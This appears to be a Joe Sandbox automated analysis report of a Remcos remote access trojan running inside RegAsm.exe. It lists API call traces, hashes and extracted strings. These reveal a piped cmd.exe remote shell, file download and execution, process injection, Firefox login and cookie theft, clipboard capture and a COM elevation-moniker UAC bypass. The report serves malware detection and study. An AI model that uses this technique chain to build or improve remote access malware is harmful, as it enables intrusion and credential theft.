                                          • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                          • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                          • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                          APIs
                                          • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc__crt_fast_encode_pointer
                                          • String ID:
                                          • API String ID: 2279764990-0
                                          • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                          • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                          • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                          • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                          APIs
                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                            • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateEventStartupsocket
                                          • String ID:
                                          • API String ID: 1953588214-0
                                          • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                          • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                          • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                          • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          APIs
                                          • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                          • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                          • String ID:
                                          • API String ID: 3750050125-0
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 0041BB49
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$ForegroundText
                                          • String ID:
                                          • API String ID: 29597999-0
                                          APIs
                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                          • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                            • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                          • String ID:
                                          • API String ID: 1170566393-0
                                          APIs
                                            • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                          • String ID:
                                          • API String ID: 806969131-0
                                          APIs
                                            • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                          • String ID:
                                          • API String ID: 806969131-0
                                          APIs
                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                            • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                            • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                          • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                          • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                          • String ID:
                                          • API String ID: 2948481953-0
                                          APIs
                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: __crt_fast_encode_pointer
                                          • String ID:
                                          • API String ID: 3768137683-0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __alldvrm
                                          • String ID:
                                          • API String ID: 65215352-0
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          APIs
                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Startup
                                          • String ID:
                                          • API String ID: 724789610-0
                                          APIs
                                          • GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FromGdipImageLoadStream
                                          • String ID:
                                          • API String ID: 3292405956-0
                                          APIs
                                          • GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: GdipImageSaveStream
                                          • String ID:
                                          • API String ID: 971487142-0
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00004C01,004758E8,00000000,00000000), ref: 00404BF8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          APIs
                                          • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Deallocatestd::_
                                          • String ID:
                                          • API String ID: 1323251999-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: recv
                                          • String ID:
                                          • API String ID: 1507349165-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          APIs
                                          • GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                          Similarity
                                          • API ID: DisposeGdipImage
                                          • String ID:
                                          • API String ID: 1024088383-0
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                          • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                            • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C37D
                                            • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C3AD
                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C402
                                            • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C463
                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C46A
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                          • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                          • DeleteFileA.KERNEL32(?), ref: 0040868D
                                            • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                            • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                            • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                            • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                          • Sleep.KERNEL32(000007D0), ref: 00408733
                                          • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                            • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                          Strings
                                          Similarity
                                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                          • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                          • API String ID: 1067849700-181434739
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 004056E6
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • __Init_thread_footer.LIBCMT ref: 00405723
                                          • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                          • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                          • PeekNamedPipe.KERNEL32 ref: 004058BC
                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                          • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                          • CloseHandle.KERNEL32 ref: 00405A23
                                          • CloseHandle.KERNEL32 ref: 00405A2B
                                          • CloseHandle.KERNEL32 ref: 00405A3D
                                          • CloseHandle.KERNEL32 ref: 00405A45
                                          Strings
                                          Similarity
                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                          • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                          • API String ID: 2994406822-18413064
                                          APIs
                                          • GetCurrentProcessId.KERNEL32 ref: 00412141
                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                          • OpenMutexA.KERNEL32 ref: 00412181
                                          • CloseHandle.KERNEL32(00000000), ref: 00412190
                                          • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                          Strings
                                          Similarity
                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$`.p$fsutil.exe$rmclient.exe$svchost.exe
                                          • API String ID: 3018269243-1689298428
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                          • FindClose.KERNEL32(00000000), ref: 0040BC04
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                          • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                          Strings
                                          Similarity
                                          • API ID: Find$CloseFile$FirstNext
                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                          • API String ID: 1164774033-3681987949
                                          APIs
                                          • OpenClipboard.USER32 ref: 004168FD
                                          • EmptyClipboard.USER32 ref: 0041690B
                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                          • GlobalLock.KERNEL32(00000000), ref: 00416934
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                          • CloseClipboard.USER32 ref: 00416990
                                          • OpenClipboard.USER32 ref: 00416997
                                          • GetClipboardData.USER32 ref: 004169A7
                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                          • CloseClipboard.USER32 ref: 004169BF
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Similarity
                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                          • String ID: !D@
                                          • API String ID: 3520204547-604454484
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                          • FindClose.KERNEL32(00000000), ref: 0040BE04
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                          • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                          • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                          Strings
                                          Similarity
                                          • API ID: Find$Close$File$FirstNext
                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 3527384056-432212279
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                          • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                          Strings
                                          Similarity
                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$`.p$ieinstal.exe$ielowutil.exe
                                          • API String ID: 3756808967-2797908973
                                          APIs
                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                          • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                          • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                          • CloseHandle.KERNEL32(?), ref: 004134A0
                                          Similarity
                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                          • String ID:
                                          • API String ID: 297527592-0
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: 0$1$2$3$4$5$6$7$VG
                                          • API String ID: 0-1861860590
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C37D
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C3AD
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C41F
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C42C
                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C402
                                          • GetLastError.KERNEL32(?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C44D
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C463
                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C46A
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C473
                                          Strings
                                          Similarity
                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                          • String ID: `.p
                                          • API String ID: 2341273852-3969149474
                                          APIs
                                          • _wcslen.LIBCMT ref: 0040755C
                                          • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                          Strings
                                          Similarity
                                          • API ID: Object_wcslen
                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                          • API String ID: 240030777-3166923314
                                          • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                          • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                          • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                          • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                          APIs
                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
